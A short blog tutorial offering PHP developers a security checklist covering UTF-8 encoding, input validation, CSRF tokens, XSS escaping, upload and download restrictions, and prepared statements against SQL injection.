Facebook
Google+
LinkedIn
Twitter
Pinterest
Send to friend

Developing secured web application with PHP

Rating: 4.00 Votes: 2
Nov 21, 2019
Tags PHP, Web Developement, Security
1740 Views
0 Comment

Your PHP web application is deployed on the secured platform is great but it is not just enough to consider your application is secured. It is equally or more important that your source code is also developed in the same intensity of security and passed through security testing. I would like to propose certain check list to consider before you go live with your site. PHP is considered one of the easiest languages for developing web applications and this gives chance to startup developers to leave common PHP security pitfalls in development.

Listed out bellow are few points which can be used as a check list before you publish your web application.

  • Character encoding: The thumb rule is always create a valid output and use UTF-8 for the encoding like in Html, Database, Html, JS, URLs, Emails and wherever it is possible.
  • User Input Data Validation: Validate the user input data according to which purpose it is collected from them. It is always a good idea to validate the user input data at the PHP logic even if your JavaScript validate it at the browser itself. Type-casting is also helpful in most of the cases.
  • CSRF or XSRF – Cross Site Request Forgeries: a request from the different site which misuses users authenticated stat data to hack or perform unwanted operations. While user is logged in, his session data is shared across all tabs in the same browser. Code the PHP script that way it uses minimum time of GET requests or probably only to access the information rather than transactions. Avoid using $_REQUEST as much possible instead use $_GET or $_POST accordingly wherever you retrieve variables.

Another way is to generate a random value known as token while user successfully log in at the application. Store this token value in the session and check in application logic whenever user requests or post any information.

  • XSS – Cross site scripting: always validate HTML inputs from user’s submitted data in case like accepting comments on the posts, or collecting reviews and display them on the site. It may use to steal session an cookie data and run kind of JS script on the browser. Use strip_tags() and /or htmlspecialchars() functions which encode and prevent users data to create an HTML tags.
  • Non-disclose of file system: If your website allows to download any file to its users, always use some functions which takes file path as an internal system input and use respective header() arguments to download the file. Do not create a like for the file which displays whole folder structure in the link itself to download the file.
  • Restrict the file uploads: a user could upload a .php extension file or any other executable file through your file upload feature on site. Check the MIME type of the uploaded file with the function like finfo_file() or any similar to validate the type of file. Create an array of allowable file extensions and keep checking with the uploaded file extension is present in the allowable array or not.
  • SQL injection: any input which is concatenated into a string as an SQL query is called the SQL injection. Characters like semicolon, single quote, double quote, hyphens, etc which are used in the SQL queries or statements, should be escaped. This compromise the database and it allowed to be accessed by unauthorized way. Developer can use the pair of prepare () and execute () statement to execute the query rather than simply write a row query to fire on database. Most of the new generation frameworks for PHP take care of this.
  • Other security measures includes
    • Use a proper error handling.
    • Always use .php extensions to included files.
    • Filter values of “From” header before you create that in the Email function.
    • Use strong password hashing algorithm while storing the passwords.
    • Encrypt the session data before you store.
    • Strong cipher code to encrypt data is also a good measure.

Web application security measures are taken at the time of designing its architecture. Also it should not happen that steps taken from the security point of view decreases the scope of usability. Security must be implemented keeping in the mind of your website users and must be included in the development budget.

This is a short tutorial for PHP developers and has just stretched the surface of the development techniques. It is up to the developer who understands the depth of vulnerabilities and possible attacks on applications over the web. Developers are required to drill more on each points which are listed and /or which are left from discussion here.

Leave Comment

The date and time of submission and your device`s IP address will be recorded when you click Save comment.
You can enter your social network profile link here
Answer simple math : 18 + 0 = ?

0 Comment

Can't read? Reload